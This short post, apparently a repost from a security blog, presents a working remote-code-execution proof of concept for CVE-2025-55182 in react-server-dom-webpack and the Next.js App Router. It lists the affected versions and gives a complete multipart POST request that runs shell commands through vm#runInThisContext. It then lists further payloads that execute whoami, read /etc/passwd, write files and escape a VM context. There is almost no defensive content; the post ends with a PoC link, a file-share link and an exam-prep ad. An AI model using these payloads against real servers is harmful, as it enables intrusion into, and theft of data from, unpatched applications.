Almost every Next.js app pulls in a package that includes fs, a truly big hole!
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 15.x, 16.x (App Router)
npm install
node --conditions react-server --conditions webpack src/server.js
Reproduction request:

POST /formaction HTTP/1.1
Host: localhost:3002
Content-Type: multipart/form-data; boundary=----Boundary
Content-Length: 297

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"


------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"id\").toString()"]}
------Boundary--
{ id: 'child_process#execSync', bound: ['whoami'] }
{ id: 'fs#readFileSync', bound: ['/etc/passwd'] }
{ id: 'fs#writeFileSync', bound: ['/tmp/pwned.txt', 'CVE-2025-55182'] }
{ id: 'vm#runInThisContext', bound: ['process.mainModule.require("child_process").execSync("id").toString()'] }
{ id: 'vm#runInNewContext', bound: ['this.constructor.constructor("return process")().mainModule.require("child_process").execSync("whoami").toString()'] }
https://github.com/ejpir/CVE-2025-55182-poc/
https://pan.quark.cn/s/d72c76a455c5
Security certification exam prep (CISP, NISP, CISP-PTE and others): add Admin_Ran

